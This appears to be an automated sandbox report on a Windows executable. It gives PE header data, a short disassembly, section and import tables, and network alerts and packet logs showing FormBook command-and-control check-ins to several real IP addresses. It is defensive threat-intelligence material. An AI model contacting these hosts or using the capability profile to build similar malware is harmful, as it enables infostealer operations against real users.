            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
            Time Stamp:0x66A39B3B [Fri Jul 26 12:48:59 2024 UTC]
            TLS Callbacks:
            CLR (.Net) Version:
            OS Version Major:5
            OS Version Minor:1
            File Version Major:5
            File Version Minor:1
            Subsystem Version Major:5
            Subsystem Version Minor:1
            Import Hash:948cc502fe9226992dce9417f952fce3
            Instruction
            call 00007FC2F4E86973h
            jmp 00007FC2F4E8627Fh
            push ebp
            mov ebp, esp
            push esi
            push dword ptr [ebp+08h]
            mov esi, ecx
            call 00007FC2F4E8645Dh
            mov dword ptr [esi], 0049FDF0h
            mov eax, esi
            pop esi
            pop ebp
            retn 0004h
            and dword ptr [ecx+04h], 00000000h
            mov eax, ecx
            and dword ptr [ecx+08h], 00000000h
            mov dword ptr [ecx+04h], 0049FDF8h
            mov dword ptr [ecx], 0049FDF0h
            ret
            push ebp
            mov ebp, esp
            push esi
            push dword ptr [ebp+08h]
            mov esi, ecx
            call 00007FC2F4E8642Ah
            mov dword ptr [esi], 0049FE0Ch
            mov eax, esi
            pop esi
            pop ebp
            retn 0004h
            and dword ptr [ecx+04h], 00000000h
            mov eax, ecx
            and dword ptr [ecx+08h], 00000000h
            mov dword ptr [ecx+04h], 0049FE14h
            mov dword ptr [ecx], 0049FE0Ch
            ret
            push ebp
            mov ebp, esp
            push esi
            mov esi, ecx
            lea eax, dword ptr [esi+04h]
            mov dword ptr [esi], 0049FDD0h
            and dword ptr [eax], 00000000h
            and dword ptr [eax+04h], 00000000h
            push eax
            mov eax, dword ptr [ebp+08h]
            add eax, 04h
            push eax
            call 00007FC2F4E8901Dh
            pop ecx
            pop ecx
            mov eax, esi
            pop esi
            pop ebp
            retn 0004h
            lea eax, dword ptr [ecx+04h]
            mov dword ptr [ecx], 0049FDD0h
            push eax
            call 00007FC2F4E89068h
            pop ecx
            ret
            push ebp
            mov ebp, esp
            push esi
            mov esi, ecx
            lea eax, dword ptr [esi+04h]
            mov dword ptr [esi], 0049FDD0h
            push eax
            call 00007FC2F4E89051h
            test byte ptr [ebp+08h], 00000001h
            pop ecx
            Programming Language:
            • [ C ] VS2008 SP1 build 30729
            • [IMP] VS2008 SP1 build 30729
            Name | Virtual Address | Virtual Size | Is in Section
            IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_IMPORT | 0xc8e64 | 0x17c | .rdata
            IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xd4000 | 0x55864 | .rsrc
            IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x12a000 | 0x7594 | .reloc
            IMAGE_DIRECTORY_ENTRY_DEBUG | 0xb0ff0 | 0x1c | .rdata
            IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_TLS | 0xc3400 | 0x18 | .rdata
            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xb1010 | 0x40 | .rdata
            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_IAT | 0x9c000 | 0x894 | .rdata
            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
            Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
            .text | 0x1000 | 0x9ab1d | 0x9ac00 | 0a1473f3064dcbc32ef93c5c8a90f3a6 | False | 0.565500681542811 | data | 6.668273581389308 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            .rdata | 0x9c000 | 0x2fb82 | 0x2fc00 | c9cf2468b60bf4f80f136ed54b3989fb | False | 0.35289185209424084 | data | 5.691811547483722 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
            .data | 0xcc000 | 0x706c | 0x4800 | 53b9025d545d65e23295e30afdbd16d9 | False | 0.04356553819444445 | DOS executable (block device driver @\273\) | 0.5846666986982398 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            .rsrc | 0xd4000 | 0x55864 | 0x55a00 | c041339bd03a849e09dc3f88a9a09434 | False | 0.922764598540146 | data | 7.8846075295122855 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
            .reloc | 0x12a000 | 0x7594 | 0x7600 | c68ee8931a32d45eb82dc450ee40efc3 | False | 0.7628111758474576 | data | 6.7972128181359786 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
            Name | RVA | Size | Type | Language | Country | ZLIB Complexity
            RT_ICON | 0xd45a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
            RT_ICON | 0xd46d0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
            RT_ICON | 0xd47f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
            RT_ICON | 0xd4920 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
            RT_ICON | 0xd4c08 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
            RT_ICON | 0xd4d30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
            RT_ICON | 0xd5bd8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
            RT_ICON | 0xd6480 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
            RT_ICON | 0xd69e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
            RT_ICON | 0xd8f90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
            RT_ICON | 0xda038 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
            RT_MENU | 0xda4a0 | 0x50 | data | English | Great Britain | 0.9
            RT_STRING | 0xda4f0 | 0x594 | data | English | Great Britain | 0.3333333333333333
            RT_STRING | 0xdaa84 | 0x68a | data | English | Great Britain | 0.2735961768219833
            RT_STRING | 0xdb110 | 0x490 | data | English | Great Britain | 0.3715753424657534
            RT_STRING | 0xdb5a0 | 0x5fc | data | English | Great Britain | 0.3087467362924282
            RT_STRING | 0xdbb9c | 0x65c | data | English | Great Britain | 0.34336609336609336
            RT_STRING | 0xdc1f8 | 0x466 | data | English | Great Britain | 0.3605683836589698
            RT_STRING | 0xdc660 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
            RT_RCDATA | 0xdc7b8 | 0x4cb2a | data | | | 1.000337414134469
            RT_GROUP_ICON | 0x1292e4 | 0x76 | data | English | Great Britain | 0.6610169491525424
            RT_GROUP_ICON | 0x12935c | 0x14 | data | English | Great Britain | 1.25
            RT_GROUP_ICON | 0x129370 | 0x14 | data | English | Great Britain | 1.15
            RT_GROUP_ICON | 0x129384 | 0x14 | data | English | Great Britain | 1.25
            RT_VERSION | 0x129398 | 0xdc | data | English | Great Britain | 0.6181818181818182
            RT_MANIFEST | 0x129474 | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
            DLL | Import
            WSOCK32.dll | gethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
            VERSION.dll | GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
            WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
            COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
            MPR.dll | WNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
            WININET.dll | HttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
            PSAPI.DLL | GetProcessMemoryInfo
            IPHLPAPI.DLL | IcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
            USERENV.dll | DestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
            UxTheme.dll | IsThemeActive
            KERNEL32.dll | DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
            USER32.dll | GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, 
GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
            GDI32.dllEndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
            COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
            ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
            SHELL32.dllDragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
            ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
            OLEAUT32.dllCreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture
Language of compilation system | Country where language is spoken
English | Great Britain
Timestamp | Protocol | SID | Signature | Source Port | Dest Port | Source IP | Dest IP
2024-08-02T13:53:43.440829+0200 | TCP | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 64512 | 80 | 192.168.2.6 | 199.59.243.226
2024-08-02T13:53:27.259778+0200 | TCP | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 49770 | 80 | 192.168.2.6 | 217.196.55.202
2024-08-02T13:51:57.423849+0200 | TCP | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 49744 | 80 | 192.168.2.6 | 85.159.66.93
2024-08-02T13:52:25.093527+0200 | TCP | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 49752 | 80 | 192.168.2.6 | 15.197.172.60
2024-08-02T13:54:27.403003+0200 | TCP | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 64523 | 80 | 192.168.2.6 | 154.215.72.110
2024-08-02T13:53:05.503000+0200 | TCP | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 49766 | 80 | 192.168.2.6 | 15.197.240.20
2024-08-02T13:54:04.925630+0200 | TCP | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 64518 | 80 | 192.168.2.6 | 72.52.178.23
2024-08-02T13:52:38.434979+0200 | TCP | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 49758 | 80 | 192.168.2.6 | 66.29.149.46
2024-08-02T13:51:43.897495+0200 | TCP | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 49738 | 80 | 192.168.2.6 | 46.30.211.38
2024-08-02T13:51:16.664024+0200 | TCP | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 49726 | 80 | 192.168.2.6 | 52.25.92.0
2024-08-02T13:52:51.871610+0200 | TCP | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 49762 | 80 | 192.168.2.6 | 195.110.124.133
2024-08-02T13:51:30.591363+0200 | TCP | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 49733 | 80 | 192.168.2.6 | 116.50.37.244
2024-08-02T13:54:18.417842+0200 | TCP | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 64522 | 80 | 192.168.2.6 | 194.67.71.191
2024-08-02T13:50:17.693616+0200 | TCP | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 49720 | 80 | 192.168.2.6 | 154.215.72.110
2024-08-02T13:52:11.078419+0200 | TCP | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 49748 | 80 | 192.168.2.6 | 91.195.240.94
TCP Packets: Timestamp | Source Port | Dest Port | Source IP | Dest IP
            Aug 2, 2024 13:52:46.775986910 CEST8049760195.110.124.133192.168.2.6
            Aug 2, 2024 13:52:46.779866934 CEST4976080192.168.2.6195.110.124.133
            Aug 2, 2024 13:52:47.603493929 CEST4976080192.168.2.6195.110.124.133
            Aug 2, 2024 13:52:48.622704029 CEST4976180192.168.2.6195.110.124.133
            Aug 2, 2024 13:52:48.627770901 CEST8049761195.110.124.133192.168.2.6
            Aug 2, 2024 13:52:48.627880096 CEST4976180192.168.2.6195.110.124.133
            Aug 2, 2024 13:52:48.630045891 CEST4976180192.168.2.6195.110.124.133
            Aug 2, 2024 13:52:48.634917974 CEST8049761195.110.124.133192.168.2.6
            Aug 2, 2024 13:52:48.635745049 CEST8049761195.110.124.133192.168.2.6
            Aug 2, 2024 13:52:49.336429119 CEST8049761195.110.124.133192.168.2.6
            Aug 2, 2024 13:52:49.336441994 CEST8049761195.110.124.133192.168.2.6
            Aug 2, 2024 13:52:49.336574078 CEST4976180192.168.2.6195.110.124.133
            Aug 2, 2024 13:52:50.140805960 CEST4976180192.168.2.6195.110.124.133
            Aug 2, 2024 13:52:51.155159950 CEST4976280192.168.2.6195.110.124.133
            Aug 2, 2024 13:52:51.162760973 CEST8049762195.110.124.133192.168.2.6
            Aug 2, 2024 13:52:51.163003922 CEST4976280192.168.2.6195.110.124.133
            Aug 2, 2024 13:52:51.165463924 CEST4976280192.168.2.6195.110.124.133
            Aug 2, 2024 13:52:51.170613050 CEST8049762195.110.124.133192.168.2.6
            Aug 2, 2024 13:52:51.871396065 CEST8049762195.110.124.133192.168.2.6
            Aug 2, 2024 13:52:51.871475935 CEST8049762195.110.124.133192.168.2.6
            Aug 2, 2024 13:52:51.871609926 CEST4976280192.168.2.6195.110.124.133
            Aug 2, 2024 13:52:51.874687910 CEST4976280192.168.2.6195.110.124.133
            Aug 2, 2024 13:52:51.881196976 CEST8049762195.110.124.133192.168.2.6
            Aug 2, 2024 13:52:57.398654938 CEST4976380192.168.2.615.197.240.20
            Aug 2, 2024 13:52:57.405225039 CEST804976315.197.240.20192.168.2.6
            Aug 2, 2024 13:52:57.408318996 CEST4976380192.168.2.615.197.240.20
            Aug 2, 2024 13:52:57.411190987 CEST4976380192.168.2.615.197.240.20
            Aug 2, 2024 13:52:57.416490078 CEST804976315.197.240.20192.168.2.6
            Aug 2, 2024 13:52:57.913906097 CEST804976315.197.240.20192.168.2.6
            Aug 2, 2024 13:52:57.913959980 CEST4976380192.168.2.615.197.240.20
            Aug 2, 2024 13:52:58.915971994 CEST4976380192.168.2.615.197.240.20
            Aug 2, 2024 13:52:58.929197073 CEST804976315.197.240.20192.168.2.6
            Aug 2, 2024 13:52:59.936043024 CEST4976480192.168.2.615.197.240.20
            Aug 2, 2024 13:52:59.941262960 CEST804976415.197.240.20192.168.2.6
            Aug 2, 2024 13:52:59.941328049 CEST4976480192.168.2.615.197.240.20
            Aug 2, 2024 13:52:59.943882942 CEST4976480192.168.2.615.197.240.20
            Aug 2, 2024 13:52:59.948771954 CEST804976415.197.240.20192.168.2.6
            Aug 2, 2024 13:53:00.436338902 CEST804976415.197.240.20192.168.2.6
            Aug 2, 2024 13:53:00.436422110 CEST4976480192.168.2.615.197.240.20
            Aug 2, 2024 13:53:01.451515913 CEST4976480192.168.2.615.197.240.20
            Aug 2, 2024 13:53:01.456526995 CEST804976415.197.240.20192.168.2.6
            Aug 2, 2024 13:53:02.466795921 CEST4976580192.168.2.615.197.240.20
            Aug 2, 2024 13:53:02.471798897 CEST804976515.197.240.20192.168.2.6
            Aug 2, 2024 13:53:02.471878052 CEST4976580192.168.2.615.197.240.20
            Aug 2, 2024 13:53:02.474021912 CEST4976580192.168.2.615.197.240.20
            Aug 2, 2024 13:53:02.479047060 CEST804976515.197.240.20192.168.2.6
            Aug 2, 2024 13:53:02.479120016 CEST804976515.197.240.20192.168.2.6
            Aug 2, 2024 13:53:02.971468925 CEST804976515.197.240.20192.168.2.6
            Aug 2, 2024 13:53:02.971611977 CEST4976580192.168.2.615.197.240.20
            Aug 2, 2024 13:53:03.978542089 CEST4976580192.168.2.615.197.240.20
            Aug 2, 2024 13:53:03.983798027 CEST804976515.197.240.20192.168.2.6
            Aug 2, 2024 13:53:04.997124910 CEST4976680192.168.2.615.197.240.20
            Aug 2, 2024 13:53:05.002213001 CEST804976615.197.240.20192.168.2.6
            Aug 2, 2024 13:53:05.002340078 CEST4976680192.168.2.615.197.240.20
            Aug 2, 2024 13:53:05.004097939 CEST4976680192.168.2.615.197.240.20
            Aug 2, 2024 13:53:05.009133101 CEST804976615.197.240.20192.168.2.6
            Aug 2, 2024 13:53:05.501517057 CEST804976615.197.240.20192.168.2.6
            Aug 2, 2024 13:53:05.502782106 CEST804976615.197.240.20192.168.2.6
            Aug 2, 2024 13:53:05.503000021 CEST4976680192.168.2.615.197.240.20
            Aug 2, 2024 13:53:05.505700111 CEST4976680192.168.2.615.197.240.20
            Aug 2, 2024 13:53:05.510812998 CEST804976615.197.240.20192.168.2.6
            Aug 2, 2024 13:53:19.015218973 CEST4976780192.168.2.6217.196.55.202
            Aug 2, 2024 13:53:19.020235062 CEST8049767217.196.55.202192.168.2.6
            Aug 2, 2024 13:53:19.020603895 CEST4976780192.168.2.6217.196.55.202
            Aug 2, 2024 13:53:19.022710085 CEST4976780192.168.2.6217.196.55.202
            Aug 2, 2024 13:53:19.027859926 CEST8049767217.196.55.202192.168.2.6
            Aug 2, 2024 13:53:19.593957901 CEST8049767217.196.55.202192.168.2.6
            Aug 2, 2024 13:53:19.594089985 CEST8049767217.196.55.202192.168.2.6
            Aug 2, 2024 13:53:19.594165087 CEST4976780192.168.2.6217.196.55.202
            Aug 2, 2024 13:53:20.525558949 CEST4976780192.168.2.6217.196.55.202
            Aug 2, 2024 13:53:21.545015097 CEST4976880192.168.2.6217.196.55.202
            Aug 2, 2024 13:53:21.555551052 CEST8049768217.196.55.202192.168.2.6
            Aug 2, 2024 13:53:21.556163073 CEST4976880192.168.2.6217.196.55.202
            Aug 2, 2024 13:53:21.558305979 CEST4976880192.168.2.6217.196.55.202
            Aug 2, 2024 13:53:21.563421011 CEST8049768217.196.55.202192.168.2.6
            Aug 2, 2024 13:53:22.142978907 CEST8049768217.196.55.202192.168.2.6
            Aug 2, 2024 13:53:22.143121004 CEST8049768217.196.55.202192.168.2.6
            Aug 2, 2024 13:53:22.143193007 CEST4976880192.168.2.6217.196.55.202
            Aug 2, 2024 13:53:23.072304010 CEST4976880192.168.2.6217.196.55.202
            Aug 2, 2024 13:53:24.091871977 CEST4976980192.168.2.6217.196.55.202
            Aug 2, 2024 13:53:24.096899033 CEST8049769217.196.55.202192.168.2.6
            Aug 2, 2024 13:53:24.096971989 CEST4976980192.168.2.6217.196.55.202
            Aug 2, 2024 13:53:24.099364042 CEST4976980192.168.2.6217.196.55.202
            Aug 2, 2024 13:53:24.104518890 CEST8049769217.196.55.202192.168.2.6
            Aug 2, 2024 13:53:24.104532957 CEST8049769217.196.55.202192.168.2.6
            Aug 2, 2024 13:53:24.672560930 CEST8049769217.196.55.202192.168.2.6
            Aug 2, 2024 13:53:24.672996998 CEST8049769217.196.55.202192.168.2.6
            Aug 2, 2024 13:53:24.673150063 CEST4976980192.168.2.6217.196.55.202
            Aug 2, 2024 13:53:25.605238914 CEST4976980192.168.2.6217.196.55.202
            Aug 2, 2024 13:53:26.623091936 CEST4977080192.168.2.6217.196.55.202
            Aug 2, 2024 13:53:26.628134966 CEST8049770217.196.55.202192.168.2.6
            Aug 2, 2024 13:53:26.628245115 CEST4977080192.168.2.6217.196.55.202
            Aug 2, 2024 13:53:26.630445004 CEST4977080192.168.2.6217.196.55.202
            Aug 2, 2024 13:53:26.635461092 CEST8049770217.196.55.202192.168.2.6
            Aug 2, 2024 13:53:27.259416103 CEST8049770217.196.55.202192.168.2.6
            Aug 2, 2024 13:53:27.259557009 CEST8049770217.196.55.202192.168.2.6
            Aug 2, 2024 13:53:27.259778023 CEST4977080192.168.2.6217.196.55.202
            Aug 2, 2024 13:53:27.265239954 CEST4977080192.168.2.6217.196.55.202
            Aug 2, 2024 13:53:27.271522045 CEST8049770217.196.55.202192.168.2.6
            Aug 2, 2024 13:53:35.331267118 CEST6450980192.168.2.6199.59.243.226
            Aug 2, 2024 13:53:35.336103916 CEST8064509199.59.243.226192.168.2.6
            Aug 2, 2024 13:53:35.336239100 CEST6450980192.168.2.6199.59.243.226
            Aug 2, 2024 13:53:35.339806080 CEST6450980192.168.2.6199.59.243.226
            Aug 2, 2024 13:53:35.345046997 CEST8064509199.59.243.226192.168.2.6
            Aug 2, 2024 13:53:35.868133068 CEST8064509199.59.243.226192.168.2.6
            Aug 2, 2024 13:53:35.868191957 CEST8064509199.59.243.226192.168.2.6
